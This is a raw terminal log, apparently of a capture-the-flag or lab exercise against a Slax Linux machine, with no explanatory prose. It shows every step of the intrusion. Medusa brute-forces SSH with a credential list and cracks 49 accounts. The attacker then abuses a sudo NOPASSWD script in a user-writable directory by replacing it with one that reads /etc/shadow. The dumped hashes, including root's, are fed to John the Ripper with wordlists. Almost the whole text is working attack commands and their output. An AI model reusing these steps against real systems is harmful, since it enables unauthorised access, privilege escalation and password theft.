daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
qpowers:x:1000:100:Quinton Powers:/home/qpowers:
mbryan:x:1001:100:Michael Bryan:/home/mbryan:
dgrant:x:1002:100:Daniel Grant:/home/dgrant:
dgilfillan:x:1003:100:Darcy Gilfillan:/home/dgilfillan:
jbresnahan:x:1004:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1005:100:Adam Adams:/home/aadams:
aweiland:x:1006:100:Adam Weiland:/home/aweiland:
cchisholm:x:1007:100:Cindy Chisholm:/home/cchisholm:
jfranklin:x:1008:100:Johnny Franklin:/home/jfranklin:
hlovell:x:1009:100:Henrietta Lovell:/home/hlovell:
bphillips:x:1010:100:Brad Phillips:/home/bphillips:
myajima:x:1011:100:Moto Yajima:/home/myajima:
jalcantar:x:1012:100:Jesse Alcantar:/home/jalcantar:
jayala:x:1013:100:John Ayala:/home/jayala:
aard:x:1014:100:Aaron Ard:/home/aard:
aharp:x:1015:100:Annie Harp:/home/aharp:
lmorales:x:1016:100:Lindsey Morales:/home/lmorales:
kclemons:x:1017:100:Kathryn Clemons:/home/kclemons:
tgoodchap:x:1018:100:Taj Goodchap:/home/tgoodchap:
tdeleon:x:1019:100:Terrence Deleon:/home/tdeleon:
krenfro:x:1020:100:Kimberly Renfro:/home/krenfro:
bbanter:x:1021:100:Bob Banter:/home/bbanter:
aspears:x:1022:100:Adam Spears:/home/aspears:
djohnson:x:1023:100:Daniel Johnson:/home/djohnson:
aheflin:x:1024:100:Anna Heflin:/home/aheflin:
jdavenport:x:1025:100:James Davenport:/home/jdavenport:
sgains:x:1026:100:Susan Gains:/home/sgains:
swarren:x:1027:100:Samuel Warren:/home/swarren:
rdominguez:x:1028:100:Rafael Dominguez:/home/rdominguez:
ktso:x:1029:100:Kristen Tso:/home/ktso:
amaynard:x:1030:100:Arthur Maynard:/home/amaynard:
lmartinez:x:1031:100:Luis Martinez:/home/lmartinez:
dwestling:x:1032:100:David Westling:/home/dwestling:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
jalvarez:x:1034:100:Joy Alvarez:/home/jalvarez:
mrodriguez:x:1035:100:Manuel Rodriguez:/home/mrodriguez:
rjacobson:x:1036:100:Randy Jacobson:/home/rjacobson:
dcooper:x:1037:100:Donald Cooper:/home/dcooper:
mholland:x:1038:100:Marian Holland:/home/mholland:
aallen:x:1039:100:Aaron Allen:/home/aallen:
ccoffee:x:1040:100:Chad Coffee:/home/ccoffee:
sjohnson:x:1041:100:Steven Johnson:/home/sjohnson:
bwatkins:x:1042:100:Brandon Watkins:/home/bwatkins:
kwebber:x:1043:100:Kathleen Webber:/home/kwebber:
rpatel:x:1044:100:Randall Patel:/home/rpatel:
jduff:x:1045:100:Jerry Duff:/home/jduff:
mnader:x:1046:100:Muhammad Nader:/home/mnader:
strammel:x:1047:100:Stephanie Trammel:/home/strammel:
dstevens:x:1048:100:Donald Stevens:/home/dstevens:

root@kali:~# pico  user_pass-txt
:aadams:whatever
:aallen:nintendo
:aard:kotaku
:aharp:passw0rd
:aheflin:654321
:amaynard:123456
:aspears:monkey
:aweiland:123123
:bbanter:iloveyou
:bphillips:sunshine
:bwatkins:superman
:cchisholm:1234567
:ccoffee:princess
:dcooper:consumer
:dgilfillan:abc123
:dgrant:cheese
:djohnson:111111
:dstevens:jennifer
:dtraylor:starwars
:dwestling:blahblah
:hlovell:welcome
:jalcantar:pokemon
:jalvarez:666666
:jayala:michael
:jbresnahan:Password
:jdavenport:babyl0n
:jduff:trustno1
:jfranklin:password
:kclemons:killer
:krenfro:gizmodo
:ktso:computer
:kwebber:lifehack
:lmartinez:michelle
:lmorales:master
:mbryan:pepper
:mholland:baseball
:mnader:soccer
:mrodriguez:jordan
:myajima:12345
:qpowers:12345678
:rdominguez:gawker
:rjacobson:internet
:rpatel:0
:sgains:batman
:sjohnson:football
:strammel:dragon
:swarren:shadow
:tdeleon:qwerty
:tgoodchap:letmein

root@kali:~# medusa -h 192.168.1.120 -C user_pass-txt -M ssh -v 6
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: [combo]
GENERAL: Total Passwords: [combo]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aadams (1 of 49, 0 complete) Password: whatever (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aadams Password: whatever [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aallen (2 of 49, 1 complete) Password: nintendo (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aallen Password: nintendo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aard (3 of 49, 2 complete) Password: kotaku (1 of 1

complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aard Password: kotaku [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aharp (4 of 49, 3 complete) Password: passw0rd (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aharp Password: passw0rd [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aheflin (5 of 49, 4 complete) Password: 654321 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aheflin Password: 654321 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: amaynard (6 of 49, 5 complete) Password: 123456 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: amaynard Password: 123456 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aspears (7 of 49, 6 complete) Password: monkey (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aspears Password: monkey [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aweiland (8 of 49, 7 complete) Password: 123123 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aweiland Password: 123123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bbanter (9 of 49, 8 complete) Password: iloveyou (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bbanter Password: iloveyou [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bphillips (10 of 49, 9 complete) Password: sunshine

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bphillips Password: sunshine [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bwatkins (11 of 49, 10 complete) Password: superman

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bwatkins Password: superman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: cchisholm (12 of 49, 11 complete) Password: 1234567

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: cchisholm Password: 1234567 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ccoffee (13 of 49, 12 complete) Password: princess (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ccoffee Password: princess [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dcooper (14 of 49, 13 complete) Password: consumer (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dcooper Password: consumer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgilfillan (15 of 49, 14 complete) Password: abc123

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgilfillan Password: abc123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgrant (16 of 49, 15 complete) Password: cheese (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgrant Password: cheese [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: djohnson (17 of 49, 16 complete) Password: 111111 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: djohnson Password: 111111 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dstevens (18 of 49, 17 complete) Password: jennifer

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dstevens Password: jennifer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dtraylor (19 of 49, 18 complete) Password: starwars

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dtraylor Password: starwars [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dwestling (20 of 49, 19 complete) Password: blahblah

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dwestling Password: blahblah [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: hlovell (21 of 49, 20 complete) Password: welcome (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: hlovell Password: welcome [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalcantar (22 of 49, 21 complete) Password: pokemon

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalcantar Password: pokemon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalvarez (23 of 49, 22 complete) Password: 666666 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalvarez Password: 666666 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jayala (24 of 49, 23 complete) Password: michael (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jayala Password: michael [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jbresnahan (25 of 49, 24 complete) Password: Password

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jbresnahan Password: Password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jdavenport (26 of 49, 25 complete) Password: babyl0n

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jdavenport Password: babyl0n [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jduff (27 of 49, 26 complete) Password: trustno1 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jduff Password: trustno1 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jfranklin (28 of 49, 27 complete) Password: password

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jfranklin Password: password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kclemons (29 of 49, 28 complete) Password: killer (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kclemons Password: killer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: krenfro (30 of 49, 29 complete) Password: gizmodo (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: krenfro Password: gizmodo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ktso (31 of 49, 30 complete) Password: computer (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ktso Password: computer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kwebber (32 of 49, 31 complete) Password: lifehack (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kwebber Password: lifehack [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmartinez (33 of 49, 32 complete) Password: michelle

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmartinez Password: michelle [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmorales (34 of 49, 33 complete) Password: master (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmorales Password: master [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mbryan (35 of 49, 34 complete) Password: pepper (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mbryan Password: pepper [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mholland (36 of 49, 35 complete) Password: baseball

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mholland Password: baseball [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mnader (37 of 49, 36 complete) Password: soccer (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mnader Password: soccer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mrodriguez (38 of 49, 37 complete) Password: jordan

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mrodriguez Password: jordan [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: myajima (39 of 49, 38 complete) Password: 12345 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: myajima Password: 12345 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: qpowers (40 of 49, 39 complete) Password: 12345678 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: qpowers Password: 12345678 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rdominguez (41 of 49, 40 complete) Password: gawker

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rdominguez Password: gawker [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rjacobson (42 of 49, 41 complete) Password: internet

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rjacobson Password: internet [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rpatel (43 of 49, 42 complete) Password: 0 (1 of 1

complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rpatel Password: 0 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sgains (44 of 49, 43 complete) Password: batman (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sgains Password: batman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sjohnson (45 of 49, 44 complete) Password: football

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sjohnson Password: football [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: strammel (46 of 49, 45 complete) Password: dragon (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: strammel Password: dragon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: swarren (47 of 49, 46 complete) Password: shadow (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: swarren Password: shadow [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tdeleon (48 of 49, 47 complete) Password: qwerty (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tdeleon Password: qwerty [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tgoodchap (49 of 49, 48 complete) Password: letmein

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tgoodchap Password: letmein [SUCCESS]
GENERAL: Medusa has finished.

root@kali:~# ssh aadams@192.168.1.120
aadams@192.168.1.120's password:
Linux 2.6.27.27.
aadams@slax:~$
aadams@slax:~$ uname -a
Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz GenuineIntel

GNU/Linux
aadams@slax:~$ id
uid=1005(aadams) gid=100(users) groups=100(users)
aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user aadams may not run sudo on slax.
aadams@slax:~$

aadams@slax:~$ cat /etc/group
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root
video:x:18:root
cdrom:x:19:root
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
tape:x:26:root
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root
power:x:84:
pop:x:90:pop
scanner:x:93:
nobody:x:98:nobody
nogroup:x:99:
users:x:100:ccoffee
console:x:101:
admin:x:102:ccoffee

root@kali:~# ssh ccoffee@192.168.1.120
ccoffee@192.168.1.120's password:
Linux 2.6.27.27.
ccoffee@slax:~$

ccoffee@slax:~$ ls -al
total 12
drwx------  3 ccoffee users  120 Jan 13 10:20 ./
dr-xr-xr-x 53 root    root  1040 Jan 13 10:20 ../
-rwx------  1 ccoffee users 3729 Jan 13 10:20 .screenrc*
-rwx------  1 ccoffee users  779 Jan 13 10:20 .xsession*
-rwx------  1 ccoffee users   57 Jan 13 10:20 DONOTFORGET*
drwx------  2 ccoffee users   60 Jan 13 10:20 scripts/

ccoffee@slax:~$ ls -al scripts/
total 4
drwx------ 2 ccoffee users  60 Jan 13 10:20 ./
drwx------ 3 ccoffee users 120 Jan 13 10:20 ../
-rws--x--x 1 root    admin 110 Jan 13 10:20 getlogs.sh*

ccoffee@slax:~$ cat scripts/getlogs.sh
cat: scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo cat scripts/getlogs.sh

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user ccoffee is not allowed to execute '/usr/bin/cat scripts/getlogs.sh' as root on slax.
ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh

ccoffee@slax:~$ /home/ccoffee/scripts/getlogs.sh
/bin/bash: /home/ccoffee/scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo /home/ccoffee/scripts/getlogs.sh
wrong!

ccoffee@slax:~$ cd scripts
ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ vi getlogs.sh

#!/bin/bash
whoami
id
cat /etc/shadow

ccoffee@slax:~/scripts$ chmod 744 getlogs.sh

ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18

(video),19(cdrom),26(tape),83(plugdev)
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
qpowers:$1$eob/a4xo$fPoSwbgY22gWL8qyDU/.I.:16083:0:99999:7:::
mbryan:$1$tmf/f4xo$awoQgL2oPSZMX2lM12Uln1:16083:0:99999:7:::
dgrant:$1$OCh/k4xo$JDbEKsV06nre8zZPrRUvo/:16083:0:99999:7:::
dgilfillan:$1$8hi/p4xo$bWC1IcRe1crQa3s3miuL20:16083:0:99999:7:::
jbresnahan:$1$2Xk/u4xo$mjNw/vkqgdGQTIeYGK8nZ.:16083:0:99999:7:::
aadams:$1$Ttl/z4xo$UZgXCB9PGAEWTrzVJVp3K/:16083:0:99999:7:::
aweiland:$1$sQn/25xo$9y6kbW.j6RQnVz2HMP2141:16083:0:99999:7:::
cchisholm:$1$5to/75xo$6YN0xmN17AsQPldEBdPMC.:16083:0:99999:7:::
jfranklin:$1$DIq/C5xo$WmJvdtiujSkcO1/f2hr8s/:16083:0:99999:7:::
hlovell:$1$Rkr/H5xo$zu11N6JklFJOUxyb1tXTA0:16083:0:99999:7:::
bphillips:$1$eAt/M5xo$iTE1y4NzYBURlA/uLHkdb1:16083:0:99999:7:::
myajima:$1$LXu/R5xo$jLAlFMb.ocYtzQT3O02Mi.:16083:0:99999:7:::
jalcantar:$1$.Aw/W5xo$kvbWzSN38YbHd.fmsPKPh1:16083:0:99999:7:::
jayala:$1$ecx/b5xo$.n631jVFY7Brc2/mmtTJy0:16083:0:99999:7:::
aard:$1$N8z/g5xo$nvfHME6ROtq92qj9RLPFc0:16083:0:99999:7:::
aharp:$1$gd.0l5xo$1rN6r2UE6ssSQI091mcCa1:16083:0:99999:7:::
lmorales:$1$k/00q5xo$S0R/p4g1IsMwpK8Oh.J34.:16083:0:99999:7:::
kclemons:$1$xc10v5xo$CkntJIYKf2uD0wkiJ2HC00:16083:0:99999:7:::
tgoodchap:$1$y/30.6xo$PocUVCFGi9zAM3osucjfl1:16083:0:99999:7:::
tdeleon:$1$Yf4036xo$D/.NeIj324zQsz/UYQsPd0:16083:0:99999:7:::
krenfro:$1$rC6086xo$lZeDnadKgbe26e4C7Yh641:16083:0:99999:7:::
bbanter:$1$yb70D6xo$iZxi1cgaS/uLhmqhEv23Y0:16083:0:99999:7:::
aspears:$1$q790I6xo$hkQF4V5lQGAnzQwlr/Lvk0:16083:0:99999:7:::
djohnson:$1$cSA0N6xo$W62.B.xUGGpa/m.HpXD5w0:16083:0:99999:7:::
aheflin:$1$R4C0S6xo$qt/DDWtf7yneePutW7TW7.:16083:0:99999:7:::
jdavenport:$1$egt0a8xo$Lws.tBjdDpD.znXdUmj8H1:16083:0:99999:7:::
sgains:$1$tyE0c6xo$Q52MI4/PcHRpgUPaoy8UH.:16083:0:99999:7:::
swarren:$1$uTG0h6xo$EhiWJ6pmGy7QjrPg6cPcn.:16083:0:99999:7:::
rdominguez:$1$btH0m6xo$sPSjaDORJ7pbgflVMitKW.:16083:0:99999:7:::
ktso:$1$fQJ0r6xo$gpc5PjEw/l4VMBI.VhXnP/:16083:0:99999:7:::
amaynard:$1$NqK0w6xo$jXNsulUt9dqAZ4QRbc9oC1:16083:0:99999:7:::
lmartinez:$1$nNM0/7xo$7vOUEgfCSw0hGuGuprMRO1:16083:0:99999:7:::
dwestling:$1$coN047xo$8OuVbRrIUfs3EEPnq4bkI0:16083:0:99999:7:::
dtraylor:$1$SHP097xo$FSYeULOeFe2GuqoRTN/6r1:16083:0:99999:7:::
jalvarez:$1$JnQ0E7xo$tniBSw30ynprzjZUhuGUw0:16083:0:99999:7:::
mrodriguez:$1$JMS0J7xo$Qx1XpV6Yic0pmkuiZ.Txd/:16083:0:99999:7:::
rjacobson:$1$MxT0O7xo$QCmvDFxusxS9kxc4r./121:16083:0:99999:7:::
dcooper:$1$rhV0T7xo$28uQIQes7LxuYP3cOOwkE.:16083:0:99999:7:::
mholland:$1$m9X0Y7xo$vs7fehRv9EsaPuA.1Kmem1:16083:0:99999:7:::
aallen:$1$fnY0d7xo$aotMzNPT380HaEKgBB2Fd0:16083:0:99999:7:::
ccoffee:$1$XTa0i7xo$iji75/uqgm4yjzEjhCogr/:16083:0:99999:7:::
sjohnson:$1$e8c0n7xo$56pZc850Z/jVyfytGmBoX0:16083:0:99999:7:::
bwatkins:$1$Tjd0s7xo$8cabV.U80eIG6e7QfwAoN.:16083:0:99999:7:::
kwebber:$1$Dbf0x7xo$yErk7QzGlwUicnNXAI5S91:16083:0:99999:7:::
rpatel:$1$gEh008xo$Vf9/sa3I8y.ZAVVyvmIwU.:16083:0:99999:7:::
jduff:$1$Lki058xo$FaxE0BYi59/Brd/S0MKxT.:16083:0:99999:7:::
mnader:$1$tKk0A8xo$RqOuKq1VLQUaLhjxLV4yL/:16083:0:99999:7:::
strammel:$1$pyl0F8xo$8iJPFq2KWil4NBRKARDTu1:16083:0:99999:7:::
dstevens:$1$CQn0K8xo$4lawd8BU2mdjLfxm2N1WM0:16083:0:99999:7:::

root@kali:~# john shadow1
Loaded 50 password hashes with 50 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
qwerty           (tdeleon)
12345            (myajima)
password         (jfranklin)
123456           (amaynard)
computer         (ktso)
12345678         (qpowers)
abc123           (dgilfillan)
internet         (rjacobson)
shadow           (swarren)
baseball         (mholland)
letmein          (tgoodchap)
michael          (jayala)
dragon           (strammel)
michelle         (lmartinez)
jordan           (mrodriguez)
trustno1         (jduff)
soccer           (mnader)
football         (sjohnson)
batman           (sgains)
iloveyou         (bbanter)
pepper           (mbryan)
jennifer         (dstevens)
master           (lmorales)
monkey           (aspears)
sunshine         (bphillips)
whatever         (aadams)
welcome          (hlovell)
111111           (djohnson)
666666           (jalvarez)
654321           (aheflin)
killer           (kclemons)
princess         (ccoffee)
superman         (bwatkins)
123123           (aweiland)
1234567          (cchisholm)
cheese           (dgrant)
starwars         (dtraylor)
Password         (jbresnahan)
nintendo         (aallen)
passw0rd         (aharp)
blahblah         (dwestling)
pokemon          (jalcantar)
0                (rpatel)
guesses: 43  time: 0:00:01:34 0.00% (3)  c/s: 29442  trying: markey10 - marketio
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

root@kali:~# cat shadow2
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/darkc0de.lst
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:00:50 DONE (Mon Jan 13 13:22:46 2014)  c/s: 29222  trying: �migr� - �f

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:08:10 DONE (Mon Jan 13 13:32:19 2014)  c/s: 29211  trying:      123d - * 7¡Vamos!

That's all.